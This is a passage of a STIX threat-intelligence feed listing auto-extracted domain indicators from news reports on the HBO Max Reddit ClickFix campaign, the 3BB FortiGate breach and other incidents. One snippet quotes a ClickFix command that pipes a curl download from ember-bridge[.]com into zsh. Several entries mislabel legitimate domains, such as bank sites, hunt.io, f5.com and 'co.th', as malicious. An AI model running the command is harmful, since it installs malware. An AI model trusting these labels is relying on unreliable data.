codex-craft.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: inting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usi","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3dfec8a-ff54-49f4-bd04-2d8b8beff3ae","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: ng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both en","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3fbbbaf-06b8-4efd-b0e2-49b57c9d3d5a","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: al lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ab8351e2-0dc4-45ae-bb05-af4a7468ef89","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: cted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the site","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a214210d-25e8-47fd-8380-4221926f2551","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: fied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. A","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60faab08-37fe-4a2f-b283-bac9d978e278","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: focused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performe","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f822bbc5-e427-43d2-b5db-941d2c4b04be","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: 10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a comp","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b370bcb-d8da-4a5e-aaff-6102ab241b69","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: ernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested t","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae3352f3-5321-4e29-899f-640d96c8892d","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: abchina.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: .]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit","pattern":"[domain-name:value = 'abchina.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4545507-626f-408b-9663-5322bdb4f2cd","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ccb.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: k of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unio","pattern":"[domain-name:value = 'ccb.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b77f03c2-43c5-4e3b-929e-f10db737281e","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: com.cn","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Note: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultu","pattern":"[domain-name:value = 'com.cn']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6a94737-4cda-4aad-83ce-1fb6ae2f1a62","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lzbank.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abc","pattern":"[domain-name:value = 'lzbank.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de99b252-e249-42cc-b43c-1cbf3c571c7d","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clean-disk-guide.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Of the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktop","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1085033a-a09b-4249-9b8a-f4c265b53b02","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15f62368-b08c-4d44-9150-b268a7eef453","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--687b724e-fe29-4e6a-b8cb-cbc9958dc85a","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8dfc09b8-3d51-40b3-8cde-1b6e80c1c74c","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--76118df5-9953-4c69-a3d5-a5f130351bfe","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22e9b529-f9fb-4b86-945e-129c876f1a1d","created":"2026-09-14T19:03:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ttvnw.net","description":"Seen in \"Twitch extension with 30K installs exposes users’ OAuth tokens\" (BleepingComputer). Context: tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T19:03:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/twitch-extension-with-30k-installs-exposes-users-oauth-tokens/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c98b6d6c-fa83-46d4-af81-17ee8248f2a2","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15c40564-1db5-4571-8262-d427a4d2c577","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: code-desktop.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8c717fc-dc2a-4568-b02c-0c36b07b25f3","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codex-craft.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b925e8b3-79d2-4db2-8f63-5387e54e411c","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ember-bridge.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: lowing command: export _watch_v2=97d9d8dc;curl -sL \"https://ember-bridge[.]com/curl/a44a37519au/setup.sh\"| zsh Hudson Rock noted ember-b","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21c93a51-4422-4270-a4c6-9394bbff7cdf","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d41ac709-efae-4294-9ec8-a7e9cdf4319e","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.app","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--052d6b4e-269c-4f24-8756-e6de70daee00","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.us","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: Max subreddits,\" warned the user . \"The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c236a82a-d08e-484d-914a-a62566c5a89e","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: agent.3bb.co","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w","pattern":"[domain-name:value = 'agent.3bb.co']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--226cb78e-194b-445b-b6cf-e155a1201a03","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ayuthayatech.com","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--470e8af6-32e0-4eb8-9fd6-036ab6ecf420","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: co.th","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d3be4bd-84f3-4a23-847b-0a716c148376","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hunt.io","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6394c316-418a-40ab-b0b9-fa52720bc6ef","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enro","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1e18bb8-6166-4e9d-8aaf-414a246402c9","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75b2b4df-b918-4628-a9d9-3fa37faacef0","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9bccd3df-02ad-4ddf-b9b2-6c7b1aca8209","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c11f53da-226f-4c2f-a9a9-b4336d95fd98","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: f5.com","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure","pattern":"[domain-name:value = 'f5.com']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d807bfd5-56ac-479e-b86d-fa7bed409ce4","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: server.host","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffaa6136-29ee-4183-a59b-69d59159df7b","created":"2026-09-14T16:15:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: server.host","description":"Seen in \"Hackers target exposed Vite dev servers to steal AWS, Azure secrets\" (BleepingComputer). Context: pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp","pattern":"[domain-name:value = 